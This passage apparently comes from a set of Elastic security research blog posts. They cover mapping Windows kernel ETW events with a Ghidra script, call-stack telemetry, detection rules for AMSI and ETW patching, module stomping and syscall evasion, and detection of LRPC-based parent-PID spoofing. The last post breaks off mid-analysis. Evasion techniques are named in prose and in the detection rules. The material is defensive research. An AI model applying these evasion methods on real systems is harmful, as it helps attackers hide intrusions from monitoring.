The necessary parameters were the RegHandle and the EventDescriptor. The former is an opaque handle for the provider, and the latter provides event-specific information, such as the event id and its associated keywords. An ETW keyword is an identifier used to enable a set of events.

Even better, these event descriptors were typically stored in a global constant with a public symbol.

We had sufficient event metadata but still needed to resolve the opaque provider handle assigned at runtime back to the metadata about the provider. For this, we also needed the EtwRegister calls.

The typical pattern for modern kernel event providers was to store the constant provider GUID and the runtime handle in globals with public symbols.

Another pattern encountered was calls to EtwRegister, EtwWrite, and EtwUnregister, all in the same function. In this case, we took advantage of the locality to find the provider GUID for the event.
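Conceptually, these two patterns form a join between two sets of recovered call sites. The Python sketch below uses hypothetical symbol names and placeholder GUIDs. `EtwRegister` sites pair a provider GUID with the global that receives the `RegHandle`, and `EtwWrite` sites pair a `RegHandle` global with an event descriptor symbol. As a fallback for the same-function pattern, a write whose handle is not a known global is resolved via the `EtwRegister` call in the same function.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class RegisterSite:
    function: str
    provider_guid: str
    handle: Optional[str]  # global receiving the RegHandle, None if a local


@dataclass(frozen=True)
class WriteSite:
    function: str
    handle: Optional[str]  # global passed as RegHandle, None if a local
    descriptor: str  # EVENT_DESCRIPTOR global symbol


def resolve_provider(write: WriteSite, registers: list[RegisterSite]) -> Optional[str]:
    # Pattern 1: EtwRegister and EtwWrite share a global handle symbol.
    if write.handle is not None:
        for reg in registers:
            if reg.handle == write.handle:
                return reg.provider_guid
    # Pattern 2: register/write/unregister in one function, so use locality.
    for reg in registers:
        if reg.function == write.function:
            return reg.provider_guid
    return None


registers = [
    RegisterSite("ExampleProviderInit", "00000000-0000-0000-0000-00000000000a", "ExampleProviderHandle"),
    RegisterSite("ExampleOneShot", "00000000-0000-0000-0000-00000000000b", None),
]
writes = [
    WriteSite("ExampleAudit", "ExampleProviderHandle", "EXAMPLE_EVENT_ONE"),
    WriteSite("ExampleOneShot", None, "EXAMPLE_EVENT_TWO"),
]
for w in writes:
    print(w.descriptor, resolve_provider(w, registers))
# EXAMPLE_EVENT_ONE 00000000-0000-0000-0000-00000000000a
# EXAMPLE_EVENT_TWO 00000000-0000-0000-0000-00000000000b
```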

Modern TraceLogging providers, however, did not have associated per-provider public symbols to provide a hint of each provider’s purpose. Fortunately, Matt Graeber had reversed the TraceLogging metadata format and documented that the provider name is stored at a fixed offset from the provider GUID. Having the exact provider name is even better than the public symbol we recovered for modern events.
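The following Python sketch reads the name stored next to a provider GUID. It assumes the provider metadata layout from the Windows SDK `TraceLoggingProvider.h` header, as we understand it: a 16-byte provider GUID, a 2-byte `RemainingSize` field, then a NUL-terminated UTF-8 provider name. The blob in the example is synthetic, and both its leading type byte and its GUID are placeholders.

```python
import struct
import uuid


def provider_at(blob: bytes, guid_offset: int) -> tuple[uuid.UUID, str]:
    """Read a provider GUID and the provider name stored at a fixed offset after it."""
    # Windows GUIDs store their first three fields little-endian, hence bytes_le.
    guid = uuid.UUID(bytes_le=blob[guid_offset:guid_offset + 16])
    name_start = guid_offset + 16 + 2  # skip the assumed 2-byte RemainingSize field
    name_end = blob.index(b"\x00", name_start)
    return guid, blob[name_start:name_end].decode("utf-8")


# Synthetic blob: placeholder type byte, GUID, RemainingSize, name, NUL.
example_guid = uuid.UUID("12345678-1234-5678-9abc-def012345678")
name = b"Example.Provider"
blob = bytes([0x00]) + example_guid.bytes_le + struct.pack("<H", 2 + len(name) + 1) + name + b"\x00"
guid, provider = provider_at(blob, 1)
print(guid, provider)  # 12345678-1234-5678-9abc-def012345678 Example.Provider
```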

This just left the legacy providers. They didn’t seem to have either public symbols or metadata blobs. Some constants are passed to an undocumented function named EtwTraceKernelEvent which wraps the eventual ETW write call.

Those constants are present in the Windows 10 1511 WDK headers (and the System Informer headers), so we could label these events with the constant names.

This script has been recently updated for Ghidra 11, along with improved support for TraceLogging and Legacy events. You can now find it on GitHub here - https://github.com/jdu2600/API-To-ETW

Sample output for the Windows 11 kernel is here.

Our previously anonymous Microsoft-Windows-Kernel-Audit-API-Calls events are quickly unmasked by this script.

Id	EVENT_DESCRIPTOR Symbol	Function
1	KERNEL_AUDIT_API_PSSETLOADIMAGENOTIFYROUTINE	PsSetLoadImageNotifyRoutineEx
2	KERNEL_AUDIT_API_TERMINATEPROCESS	NtTerminateProcess
3	KERNEL_AUDIT_API_CREATESYMBOLICLINKOBJECT	ObCreateSymbolicLink
4	KERNEL_AUDIT_API_SETCONTEXTTHREAD	NtSetContextThread
5	KERNEL_AUDIT_API_OPENPROCESS	PsOpenProcess
6	KERNEL_AUDIT_API_OPENTHREAD	PsOpenThread
7	KERNEL_AUDIT_API_IOREGISTERLASTCHANCESHUTDOWNNOTIFICATION	IoRegisterLastChanceShutdownNotification
8	KERNEL_AUDIT_API_IOREGISTERSHUTDOWNNOTIFICATION	IoRegisterShutdownNotification

Symbol and containing function for Microsoft-Windows-Kernel-Audit-API-Calls events

With the call path and parameter information recovered by the script, we can also see that the SECURITY_ACCESSCHECK event from earlier is associated with the SeAccessCheck kernel API, but only logged within a function named SeLogAccessFailure. Only logging failure conditions is a very common occurrence with ETW events. For troubleshooting purposes, the original ETW use case, these are typically the most useful and the implementation in most components reflects this. Unfortunately, for security purposes, the inverse is often true. The successful operation logs are usually more useful for finding malicious activity. So, the value of some of these legacy events is often low.

Modern Secure by Design practice is to audit log both success and failure for security-relevant activities, and Microsoft continues to add new security-relevant ETW events that do this. For example, the preview build of Windows 11 24H2 includes some interesting new ETW events in the Microsoft-Windows-Threat-Intelligence provider. Hopefully, these will be documented for security vendors ahead of its release.

Running this decompiler script across interesting Windows drivers and service DLLs is left as an exercise to the reader.

Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks

Tue, 09 Jan 2024 00:00:00 GMT

Introduction

We were pleased to see that the kernel call stack capability we released in 8.8 was met with extremely positive community feedback - both from the offensive research teams attempting to evade us and the defensive teams triaging alerts faster due to the additional context.

But this was only the first step: We needed to arm defenders with even more visibility from the kernel - the most reliable mechanism to combat user-mode threats. With the introduction of Kernel Patch Protection in x64 Windows, Microsoft created a shared responsibility model where security vendors are now limited to only the kernel visibility and extension points that Microsoft provides. The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows (ETW) provider.

Microsoft has identified a handful of highly security-relevant syscalls and provided security vendors with near real-time telemetry of those. While we would strongly prefer inline callbacks that allow synchronous blocking of malicious activity, Microsoft has implicitly not deemed this a necessary security use case yet. Currently, the only filtering mechanism afforded to security vendors for these syscalls is user-mode hooking - and that approach is inherently fragile. At Elastic, we determined that a more robust detection approach based on kernel telemetry collected through ETW would provide greater security benefits than easily bypassed user-mode hooks. That said, kernel ETW does have some systemic issues that we have logged with Microsoft, along with suggested mitigations.

Implementation

Endpoint telemetry is a careful balance between completeness and cost. Vendors don’t want to balloon your SIEM storage costs unnecessarily, but they also don't want you to miss the critical indicator of compromise. To reduce event volumes for these new API events, we fingerprint each event and only emit it if it is unique. This deduplication ensures a minimal impact on detection fidelity.
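The following Python sketch illustrates fingerprint-based deduplication. It assumes that events are flat dictionaries with dotted keys. The fields that make up the fingerprint are a hypothetical choice for illustration, and any field left out of the fingerprint is effectively collapsed away.

```python
import hashlib
import json


class Deduplicator:
    """Emit an event only the first time its fingerprint is seen."""

    # Hypothetical choice of fields; anything excluded here is collapsed away.
    FIELDS = ("process.executable", "api.name", "api.summary", "call_stack_summary")

    def __init__(self) -> None:
        self._seen: set[str] = set()

    def fingerprint(self, event: dict) -> str:
        key = [event.get(field) for field in self.FIELDS]
        # json.dumps gives a stable, unambiguous encoding of the selected values.
        return hashlib.sha256(json.dumps(key).encode("utf-8")).hexdigest()

    def should_emit(self, event: dict) -> bool:
        fp = self.fingerprint(event)
        if fp in self._seen:
            return False
        self._seen.add(fp)
        return True


dedup = Deduplicator()
event = {
    "process.executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "api.name": "VirtualProtect",
    "api.summary": "VirtualProtect( kernel32.dll!FatalExit, 0x21, RWX, R-X )",
    "call_stack_summary": "ntdll.dll|kernelbase.dll|Unbacked",
}
print(dedup.should_emit(event), dedup.should_emit(dict(event)))  # True False
```

A long-running implementation would also need to bound the memory used by the set of fingerprints, for example by expiring old entries.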

However, this approach proved insufficient to reduce API event volumes to manageable levels in all environments. Any further global reduction of event volumes we introduced would be a blind spot for our customers. Instead of potentially impairing detection visibility in this fashion, we determined that these highly verbose events would be processed for detections on the host but would not be streamed to the SIEM by default. This approach reduces storage costs for most of our users while also empowering any customer SOCs that want the full fidelity of those events to opt into streaming via an advanced option available in Endpoint policy and implement filtering tailored to their specific environments.

Currently, we propagate visibility into the following APIs -

VirtualAlloc
VirtualProtect
MapViewOfFile
VirtualAllocEx
VirtualProtectEx
MapViewOfFile2
QueueUserAPC [call stacks not always available due to ETW limitations]
SetThreadContext [call stacks planned for 8.12]
WriteProcessMemory
ReadProcessMemory (lsass) [planned for 8.12]

In addition to call stack information, our API events are also enriched with several behaviors:

Behavior	Description
`cross-process`	The observed activity was between two processes.
`native_api`	A call was made directly to the undocumented Native API rather than the supported Win32 API.
`direct_syscall`	A syscall instruction originated outside of the Native API layer.
`proxy_call`	The call stack appears to show a proxied API call to mask the true caller.
`sensitive_api`	Executable non-image memory is unexpectedly calling a sensitive API.
`shellcode`	Suspicious executable non-image memory is calling a sensitive API.
`image-hooked`	An entry in the call stack appears to have been hooked.
`image_indirect_call`	An entry in the call stack was preceded by a call to a dynamically resolved function.
`image_rop`	An entry in the call stack was not preceded by a call instruction.
`image_rwx`	An entry in the call stack is writable.
`unbacked_rwx`	An entry in the call stack is non-image and writable.
`allocate_shellcode`	A region of non-image executable memory suspiciously allocated more executable memory.
`execute_fluctuation`	The PAGE_EXECUTE protection is unexpectedly fluctuating.
`write_fluctuation`	The PAGE_WRITE protection of executable memory is unexpectedly fluctuating.
`hook_api`	A change to the memory protection of a small executable image memory region was made.
`hollow_image`	A change to the memory protection of a large executable image memory region was made.
`hook_unbacked`	A change to the memory protection of a small executable non-image memory region was made.
`hollow_unbacked`	A change to the memory protection of a large executable non-image memory region was made.
`guarded_code`	Executable memory was unexpectedly marked as PAGE_GUARD.
`hidden_code`	Executable memory was unexpectedly marked as PAGE_NOACCESS.
`execute_shellcode`	A region of non-image executable memory was executed in an unexpected fashion.
`hardware_breakpoint_set`	A hardware breakpoint was potentially set.

New Rules

In 8.11, Elastic Defend’s behavior protection comes with many new rules against various popular malware techniques, such as shellcode fluctuation, threadless injection, direct syscalls, indirect calls, and AMSI or ETW patching.

These rules include:

Windows API Call via Direct Syscall

Identifies calls to commonly abused Windows APIs used for code injection where the call stack does not start with NTDLL:

api where event.category == "intrusion_detection" and
    process.Ext.api.behaviors == "direct_syscall" and
    process.Ext.api.name : ("VirtualAlloc*", "VirtualProtect*",
                             "MapViewOfFile*", "WriteProcessMemory")

VirtualProtect via Random Indirect Syscall

Identifies calls to the VirtualProtect API where the call stack does not originate from its equivalent NT syscall, NtProtectVirtualMemory:

api where
 process.Ext.api.name : "VirtualProtect*" and
 not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: ("*ntdll.dll!NtProtectVirtualMemory*", "*ntdll.dll!ZwProtectVirtualMemory*"))
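For readers more at home in a general-purpose language, the `_arraysearch` condition above can be approximated in Python. This sketch assumes that `:` performs a case-insensitive wildcard match, where `*` matches any run of characters and `?` matches a single character. Each pattern is translated into a regular expression so that no other characters are treated specially. The result approximates the rule's semantics and is not the Elastic Defend rule engine.

```python
import re
from typing import Iterable


def wildcard_match(value: str, pattern: str) -> bool:
    """Case-insensitive match where '*' is any run of characters and '?' is one."""
    regex = "".join(
        ".*" if ch == "*" else ("." if ch == "?" else re.escape(ch)) for ch in pattern
    )
    return re.fullmatch(regex, value, flags=re.IGNORECASE | re.DOTALL) is not None


def any_frame_matches(call_stack: list[dict], patterns: Iterable[str]) -> bool:
    """Rough equivalent of _arraysearch(call_stack, $entry, $entry.symbol_info : (...))."""
    pattern_list = list(patterns)
    return any(
        wildcard_match(frame.get("symbol_info", ""), p)
        for frame in call_stack
        for p in pattern_list
    )


NT_PROTECT = ("*ntdll.dll!NtProtectVirtualMemory*", "*ntdll.dll!ZwProtectVirtualMemory*")

normal = [
    {"symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14"},
    {"symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b"},
]
suspicious = [{"symbol_info": "Unbacked+0x3b5c"}]
# The rule fires only when no frame matches (note the leading `not`).
print(not any_frame_matches(normal, NT_PROTECT))  # False
print(not any_frame_matches(suspicious, NT_PROTECT))  # True
```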

Image Hollow from Unbacked Memory

api where process.Ext.api.behaviors == "hollow_image" and
  process.Ext.api.name : "VirtualProtect*" and
  process.Ext.api.summary : "*.dll*" and
  process.Ext.api.parameters.size >= 10000 and process.executable != null and
  process.thread.Ext.call_stack_summary : "*Unbacked*"

Below is an example match on wwanmm.dll module stomping, which replaces the module's memory content with a malicious payload:

AMSI and WLDP Memory Patching

Identifies attempts to change the memory permissions of, or write to, Microsoft Antimalware Scan Interface (AMSI) or Windows Lockdown Policy (WLDP) related DLLs in memory, in order to modify their behavior and evade malicious content checks:

api where
 (
  (process.Ext.api.name : "VirtualProtect*" and
    process.Ext.api.parameters.protection : "*W*") or
  process.Ext.api.name : "WriteProcessMemory*"
  ) and
 process.Ext.api.summary : ("* amsi.dll*", "* mpoav.dll*", "* wldp.dll*")

Evasion via Event Tracing for Windows Patching

Identifies attempts to patch Microsoft Event Tracing for Windows (ETW) via memory modification:

api where process.Ext.api.name : "WriteProcessMemory*" and
process.Ext.api.summary : ("*ntdll.dll!Etw*", "*ntdll.dll!NtTrace*") and
not process.executable : ("?:\\Windows\\System32\\lsass.exe", "\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe")

Windows System Module Remote Hooking

Identifies attempts to write to a remote process memory to modify NTDLL or Kernelbase modules as a preparation step for stealthy code injection:

api where process.Ext.api.name : "WriteProcessMemory" and
process.Ext.api.behaviors == "cross-process" and
process.Ext.api.summary : ("*ntdll.dll*", "*kernelbase.dll*")

Below is an example of matches on ThreadLessInject, a new process injection technique that involves hooking an export function from a remote process to gain shellcode execution (avoiding the creation of a remote thread):

Conclusion

Until Microsoft provides vendors with kernel callbacks for security-relevant syscalls, Threat-Intelligence ETW will remain the most robust visibility into in-memory threats on Windows. At Elastic, we’re committed to putting that visibility to work for customers and optionally directly into their hands without any hidden filtering assumptions.

Stay tuned for the call stack features in upcoming releases of Elastic Security.


Effective Parenting - detecting LRPC-based parent PID spoofing

Wed, 29 Mar 2023 00:00:00 GMT

Adversaries currently utilize RPC’s client-server architecture to obfuscate their activities on a host – including COM and WMI which are both RPC-based. For example, a number of local RPC servers will happily launch processes on behalf of a malicious client - and that form of defense evasion is difficult to flag as malicious without being able to correlate it with the client.

The above annotated screenshot is the logical process tree after a Microsoft Word macro called three COM objects, each exposing a ShellExecute interface, and also the WMI Win32_Process::Create method. The WMI call has specialized telemetry that can reconstruct that Microsoft Word initiated the process creation (the blue arrow), but the COM calls don’t (the red arrows). So defenders have no visibility that Microsoft Word made a COM call (over RPC) to spawn PowerShell elsewhere on the system.

This lack of context leaves the defender with an interpretation challenge - Word spawning PowerShell is a red flag, but is Explorer spawning PowerShell malicious, or simply user behavior?

RPC will typically use LRPC as the transport for inter-process communication. Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.

A Brief History of Child Process Evasion

It is often very beneficial for adversaries to spawn child processes during intrusions. Using legitimate pre-installed system tools to achieve your aims saves on capability development time and can potentially evade security instrumentation by providing a veneer of legitimacy for the activity.

However, for the activity to look plausibly legitimate, the parent process also needs to seem plausible. The classic counter-example is that Microsoft Word spawning PowerShell is highly anomalous. In fact, Elastic SIEM includes a prebuilt rule to detect suspicious MS Office child processes and Elastic Endpoint will also prevent malicious execution. As documented in the Elastic Global Threat Report, suspicious parent/child relationships were one of the three most common defense evasion techniques used by threats in 2022.

Endpoint Protection Platform (EPP) products could prevent the most egregious process parent relationships, but it was the rise of Endpoint Detection and Response (EDR) approaches with pervasive process start logging and the ability to retrospectively hunt that established a scalable approach to anomalous process tree detection.

Adversaries initially pivoted to evasions using a Win32 API feature introduced in Windows Vista to support User Account Control (UAC) that allows a process to specify a different logical parent process to the real calling process. However, endpoint security could still identify the real parent process based on the calling process context during the process creation notification callback, and detection rule coverage was quickly re-established.

New evasion techniques evolved in response, and a common method currently leveraged by adversaries is to indirectly spawn child processes via RPC – including DCOM and WMI which are both RPC-based. RPC can be either inter-host or simply inter-process. The latter is oxymoronically called Local Remote Procedure Call (LRPC).

The most well-known of these was the Win32_Process::Create WMI method. To detect this, Microsoft appears to have explicitly added a new Microsoft-Windows-WMI-Activity ETW event in Windows 10 1809. The new event 23 included the client process id, the missing data point needed to associate the activity with a requesting client.

Unfortunately, adversaries were quickly able to pivot to alternative out-of-process RPC servers that spawn processes, such as MMC20.Application::ExecuteShellCommand. Waiting for Microsoft to add telemetry to dual-purpose out-of-process RPC servers one by one wasn’t going to be a viable detection approach, so last year we set out on a side quest to generically associate LRPC server actions with the requesting LRPC client process.

Detecting LRPC provenance

The majority of previous public RPC telemetry research has focused on inter-host lateral movement, typically spawning a process on a remote host. For example:
- Lateral Movement using the MMC20.Application COM Object
- Lateral Movement via DCOM: Round 2
- Endpoint Detection of Remote Service Creation and PsExec
- Utilizing RPC Telemetry
- Detecting Lateral Movement techniques with Elastic
- Stopping Lateral Movement via the RPC Firewall

The ultimate advice for defenders is typically to monitor RPC network traffic for anomalies or, better yet, to block unnecessary remote access to RPC interfaces with RPC Filters (part of the Windows Filtering Platform) or specific RPC methods with 3rd party tooling like RPC Firewall.

Unfortunately, these approaches don’t work when the adversary uses RPC to spawn a process elsewhere on the same host. In this case, the RPC transport is typically ALPC, so monitoring and filtering at the network layer does not apply.

On the host, detection engineers typically look first to telemetry from the built-in Event Tracing for Windows (ETW), including the EventLog. If this proves insufficient, they can investigate custom approaches such as user-mode function hooking or mini-filter drivers.

In the RPC case, Microsoft-Windows-RPC ETW events are very useful for identifying anomalous behaviours.

Especially:
- Event 5 - RpcClientCallStart (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)
- Event 6 - RpcServerCallStart (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)

Additionally, RpcClientCallStart is generated by the client and RpcServerCallStart by the server so the ETW headers will provide the client and server process ids respectively. Further, there is a 1:1 mapping between endpoint addresses and server process ids. So the server process can be inferred from the RpcClientCallStart event.
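The inference in the last sentence amounts to a lookup. If an endpoint-to-server-PID map has already been learned (for example from server-side events), each RpcClientCallStart can be tagged with both the client PID from its ETW header and the inferred server PID. The sketch below assumes a simplified, hypothetical event record. The field and function names are illustrative and are not an ETW API.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class RpcClientCallStart:
    """Hypothetical, trimmed-down view of an RpcClientCallStart (event 5)."""
    header_pid: int      # client PID, taken from the ETW event header
    interface_uuid: str
    proc_num: int
    endpoint: str


def infer_server_pid(event: RpcClientCallStart,
                     endpoint_to_pid: Dict[str, int]) -> Optional[int]:
    # Endpoints map 1:1 to server processes, so the endpoint alone identifies
    # the server. None means this endpoint has not been observed yet.
    return endpoint_to_pid.get(event.endpoint)


def is_inter_process(event: RpcClientCallStart,
                     endpoint_to_pid: Dict[str, int]) -> bool:
    server_pid = infer_server_pid(event, endpoint_to_pid)
    return server_pid is not None and server_pid != event.header_pid
```

As discussed below, this data originates in the client process, so it is only as trustworthy as that process.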

The RPC interface UUID and procedure number, combined with the caller details, are (usually) sufficient to identify intent. For example, RPC interface UUID {367ABB81-9844-35F1-AD32-98F038001003} is the Service Control Manager Remote Protocol, which exposes the ability to configure Windows services. Procedure number (opnum) 12 in this interface is RCreateServiceW, notoriously the method that PsExec uses to execute processes on remote systems.
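In practice, mapping (InterfaceUuid, ProcNum) to intent is a table lookup. The sketch below fills in only the single MS-SCMR entry mentioned above. The table layout, the label string and the function name are illustrative assumptions, and a usable table would need many more entries.

```python
from typing import Optional

# (interface UUID, procedure number) -> human-readable method name.
# Only the entry discussed in the text is filled in; extend as needed.
RPC_METHODS = {
    ("367abb81-9844-35f1-ad32-98f038001003", 12): "SCMR RCreateServiceW",
}


def describe_call(interface_uuid: str, proc_num: int) -> Optional[str]:
    # Normalise the GUID so that braces and letter case don't affect the lookup.
    key = (interface_uuid.strip("{}").lower(), proc_num)
    return RPC_METHODS.get(key)
```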

For endpoint security vendors, however, there are a few issues to address before scalable, robust Microsoft-Windows-RPC detections would be possible:
1. RPC event volumes are significant.
2. There isn’t an obvious mechanism to strongly correlate a client call with the resultant server call.
3. There isn’t an obvious mechanism to strongly correlate a server call with the resultant server behavior.

Let’s address these three issues one by one.

LRPC event volumes

There are thousands of LRPC events each second – and most of them are uninteresting. To address the LRPC event volume concern, we could limit the events to just those RPC events that are inter-process (including inter-host). However, this immediately leads to the second concern. We need to identify the client of each server call in order to reduce event volumes down to just those which are inter-process.

Correlating RPC server calls with their clients

Modern Windows RPC has roughly three transports:
- TCP/IP (ncacn_ip_tcp, ncacn_http, ncadg_ip_udp, and ncacn_np over SMB)
- inter-process named pipes (direct ncacn_np)
- inter-process ALPC (ncalrpc)
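The list above can be expressed as a classifier over protocol sequences. This is a sketch only. In particular, treating an empty or loopback-style NetworkAddress as "local" for ncacn_np is an assumption about how these values appear in events. The function name and return labels are hypothetical.

```python
# Assumption: values that indicate the named pipe stays on this host.
LOCAL_ADDRESSES = {"", ".", "localhost", "127.0.0.1", "::1"}


def transport_for(protseq: str, network_address: str = "") -> str:
    """Rough transport class for an RPC protocol sequence (sketch)."""
    protseq = protseq.lower()
    if protseq == "ncalrpc":
        return "alpc"            # always local, inter-process
    if protseq == "ncacn_np":
        if network_address.lower() in LOCAL_ADDRESSES:
            return "named_pipe"  # direct, local named pipe
        return "tcp_ip"          # named pipe carried over SMB to another host
    if protseq in {"ncacn_ip_tcp", "ncacn_http", "ncadg_ip_udp"}:
        return "tcp_ip"
    return "unknown"
```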

The RpcServerCallStart event alone is not sufficient to determine whether the call was inter-process. It needs to be correlated against a preceding RpcClientCallStart event, and this correlation is unfortunately weak. At best, you can identify a pair of RpcServerCall start/stop events that is bracketed by a pair of RpcClientCall events with the same parameters. (Note: for performance reasons, ETW events generated on different threads may arrive out of order.) This means that you need to maintain a holistic RPC state, which creates an on-host storage and processing volume concern in the course of addressing the event volume concern.
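The bracketing heuristic, and why it is weak, can be sketched as follows. Each call is assumed to have already been reduced to a start/stop timestamp pair. Because events may arrive out of order, that step requires buffering and sorting, and this is exactly the state-keeping cost described above. The `Call` shape is hypothetical. When more than one client call qualifies, the attribution is ambiguous.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Call:
    """One RPC call reduced to start/stop timestamps (hypothetical shape)."""
    pid: int
    interface_uuid: str
    proc_num: int
    endpoint: str
    start: int  # timestamp of the *CallStart event
    stop: int   # timestamp of the matching *CallStop event


def candidate_clients(server_call: Call, client_calls: List[Call]) -> List[Call]:
    """Client calls with identical parameters whose start/stop events
    bracket the server call. More than one result means ambiguity."""
    params = (server_call.interface_uuid, server_call.proc_num, server_call.endpoint)
    return [
        c for c in client_calls
        if (c.interface_uuid, c.proc_num, c.endpoint) == params
        and c.start <= server_call.start
        and server_call.stop <= c.stop
    ]
```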

More importantly though, the RpcClientCallStart events are generated in the client process where an adversary has already achieved execution and therefore can be intercepted with very little effort. There is little point to implementing a detection for something so trivial to circumvent, especially when there are more effective options.

Ideally, the RPC server would access the client details and directly log this information. Unfortunately, the ETW events don’t include this information, which is not surprising since one of the RPC design goals was simplification through abstraction. The RPC runtime (allegedly) can be configured via Group Policy to do exactly this, though. It can store RPC State Information, which can then be used during debugging to identify the client caller from the server thread. Unfortunately, the Windows XP-era documentation didn’t immediately work for Windows 10.

It did, however, provide a rough outline of how to address the first two problems: reducing event volumes and correlating server calls to client processes. It is possible to hook the RPC runtime in all RPC servers, account for the various transports, and then log or filter inter-process RPC events only. (This is likely akin to how RPC Firewall handles network RPC, just with local endpoints.)

Correlating RPC server calls and resultant behavior

The next problem was how to correctly attribute a specific server call to the resultant server behaviour. On a busy server, how could we tie an opaque call to the ExecuteShellCommand method to a specific process creation event? And what if the call came from script-based malware and was further wrapped under a method like IDispatch::Invoke?

We didn’t want to have to inspect the RPC parameter blob and individually implement parsing support for each abusable RPC method.

Introducing ETW’s ActivityId

Thankfully, Microsoft had already thought of this scenario and provides ETW tracing guidance to developers.

They suggest that developers generate and propagate a unique 128-bit ActivityId between related ETW events to enable end-to-end tracing scenarios. This is typically handled automatically by ETW for events generated on the same thread as the value is stored in thread local storage. However, the developer must manually propagate this ID to related activities performed by other threads… or processes. As long as the RPC Runtime and all Microsoft RPC servers had followed ETW tracing best practices, we should finally have the end-to-end correlation we want!

It was time to break out a decompiler (we like Ghidra but there are many options) and inspect rpcrt4.dll. By looking at the first parameter passed to EventRegister calls, we can see that there are three ETW GUIDs in the RPC runtime. These GUIDs are defined in a contiguous block and helpfully came with public symbols.

These GUIDs correspond to Microsoft-Windows-RPC, Microsoft-Windows-Networking-Correlation and Microsoft-Windows-RPC-Events respectively. Further, the RPC runtime helpfully wraps calls to EventWrite in just two places.

The first call is in McGenEventWrite_EtwEventWriteTransfer and looks like this:

`EtwEventWriteTransfer(RegHandle, EventDescriptor, NULL, NULL, UserDataCount, UserData);`

The NULL parameters mean that ActivityId will always be the configured per-thread ActivityId and RelatedActivityId will always be excluded in events logged by this code path.

The second call is in EtwEx_tidActivityInfoTransfer and looks like this:

`EtwEventWriteTransfer(Microsoft_Windows_Networking_CorrelationHandle, EventDescriptor, ActivityId, RelatedActivityId, UserDataCount, UserData);`

This means that RelatedActivityId will only ever be logged in Microsoft-Windows-Networking-Correlation events. RPC runtime ActivityIds are (predominantly) created within a helper function that ensures that this correlation is always logged.

Decompilation also revealed that the RPC runtime allocates ETW ActivityIds by calling UuidCreate, which generates a random 128-bit value. This is done in locations such as NdrAsyncClientCall and HandleRequest. In other words, the client and server each allocate their own ActivityIds. This isn’t surprising, because the DCE/RPC specification doesn’t seem to include a transaction id or similar construct that would allow the client to propagate an ActivityId to the server. That’s okay, though: we’re currently only missing the correlation between the server call and the resultant behaviour. Also, we don’t want to trust any potentially tainted client-supplied information.

So now we know exactly how RPC intends to correlate activities triggered by RPC calls: by setting the per-thread ETW ActivityId and by logging RPC ActivityId correlations to Microsoft-Windows-Networking-Correlation. The next question is whether the Microsoft RPC interfaces that support dual-purpose activities, such as process spawning, propagate the ActivityId appropriately.

We looked at the execution traces for the four indirect process creation examples from our initial case study. In each one, the RPC request was received on one thread, a second thread handled the request and a third thread spawned the process. Other than the timing, there appeared to be no possible mechanism to link the activities.

Unfortunately, while the RPC subsystem is well behaved, most RPC servers aren't – though this likely isn't entirely their fault. The ActivityId is only preserved per-thread so if the server uses a worker thread pool (as per Microsoft’s RPC scalability advice) then the causality correlation is implicitly broken.
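Why a worker thread pool breaks causality follows directly from the ID living in thread local storage. The Python model below uses `threading.local` as a stand-in for ETW’s per-thread ActivityId. It is an analogy, not the ETW API, and all function names are hypothetical. Unless the server explicitly hands the ID to its worker, the worker reports the all-zero GUID, which is also the value kernel events were observed to log.

```python
import threading
import uuid
from concurrent.futures import ThreadPoolExecutor

# Stand-in for ETW's per-thread ActivityId, which lives in thread local storage.
_tls = threading.local()
ZERO_ID = uuid.UUID(int=0)


def set_activity_id(activity_id: uuid.UUID) -> None:
    _tls.activity_id = activity_id


def current_activity_id() -> uuid.UUID:
    # A thread that never set an ActivityId reports the all-zero GUID.
    return getattr(_tls, "activity_id", ZERO_ID)


def spawn_process() -> uuid.UUID:
    # Stand-in for the worker that creates the process: returns the
    # ActivityId that an event written on this thread would carry.
    return current_activity_id()


def handle_request(pool: ThreadPoolExecutor, propagate: bool):
    # The RPC runtime sets a fresh ActivityId on the thread receiving the call.
    set_activity_id(uuid.uuid4())
    request_id = current_activity_id()
    if propagate:
        def work() -> uuid.UUID:
            set_activity_id(request_id)  # explicit hand-off to the worker
            return spawn_process()
        logged_id = pool.submit(work).result()
    else:
        logged_id = pool.submit(spawn_process).result()  # hand-off forgotten
    return request_id, logged_id
```

A reused worker thread may even report a stale ID left behind by an earlier request, which is arguably worse than reporting none.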

Further, kernel ETW events seem to universally log an ActivityId of {00000000-0000-0000-0000-000000000000} – even when the thread has a (user-mode) ActivityId configured. It is likely that the kernel implementation of EtwWriteEvent simply does not query the ActivityId which is stored in user-mode thread local storage.

This observation about kernel events is a showstopper for a generic approach based around ETW. Almost all of the interesting resultant server behaviors (process, registry, file etc) are logged by kernel ETW events.

A new approach was necessary. It isn’t scalable to investigate individual ETW providers in dual-purpose RPC servers. (Though the Microsoft.Windows.ShellExecute TraceLogging provider looked interesting). What would Microsoft do?

What would Microsoft do?

More specifically, how does Microsoft populate the ClientProcessId in the Microsoft-Windows-WMI-Activity ETW event 23 (aka Win32_Process::Create)?

`task_023(UnicodeString CorrelationId, UInt32 GroupOperationId, UInt32 OperationId, UnicodeString Commandline, UInt32 CreatedProcessId, UInt64 CreatedProcessCreationTime, UnicodeString ClientMachine, UnicodeString ClientMachineFQDN, UnicodeString User, UInt32 ClientProcessId, UInt64 ClientProcessCreationTime, Boolean IsLocal)`

